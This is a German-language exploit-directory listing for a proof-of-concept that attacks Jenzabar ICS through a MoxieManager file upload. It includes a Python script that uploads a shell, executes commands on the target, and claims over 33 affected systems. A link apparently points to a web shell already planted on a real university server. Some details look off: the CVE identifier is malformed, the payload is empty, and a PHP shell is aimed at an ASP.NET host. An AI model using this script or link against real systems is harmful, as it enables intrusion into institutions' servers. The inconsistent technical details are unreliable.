Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8 (Kritisch) Mögliche RCE Jenzabar ICS + MoxieManager | Kitploit
Tools/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPayload-Entwicklung
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8 (Kritisch) Mögliche RCE Jenzabar ICS + MoxieManager

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8 (Kritisch) Mögliche RCE Jenzabar ICS + MoxieManager

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS Auswirkung Betroffen CVE-2026-30-03 9.8 (Kritisch) Mögliche RCE Jenzabar ICS + MoxieManager

Eine Schwachstelle in der vom System Jenzabar ICS verwendeten Komponente MoxieManager kann einen unsachgemäßen Datei-Upload ermöglichen, der unter bestimmten Bedingungen öffentlich zugänglich sein und potenziell zur Remote-Code-Ausführung (RCE) führen kann. Technische Beschreibung

Das Problem tritt auf aufgrund von:

Fehlender ordnungsgemäßer Validierung hochgeladener Dateien

Mögliche Offenlegung von Dateien über einen öffentlichen Endpunkt:

/ICS/staticpages/getfile.aspx

Inkonsistente Authentifizierungskontrolle am Endpunkt:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

In bestimmten Szenarien können hochgeladene Dateien in zugänglichen Verzeichnissen gespeichert und anschließend abgerufen werden.

Auswirkung Beliebiger Datei-Upload Offenlegung sensibler Inhalte Mögliche Remote-Code-Ausführung (abhängig von der Serverkonfiguration) Vollständige Kompromittierung des Systems

Einstufung CVSS v3.1: 9.8 (Kritisch) Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434: Unbeschränkter Datei-Upload CWE-284: Unzureichende Zugriffskontrolle

PoC-Exploit

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. Upload PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. Execute

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

Betroffene Systeme (33+ bestätigt)

Behebung Sofortmaßnahmen (Abschwächung):

  1. DELETE /moxiemanager/files/users/*/shell.php

  2. getfile.aspx einschränken:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. MoxieManager-Uploads deaktivieren

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

Tool herunterladen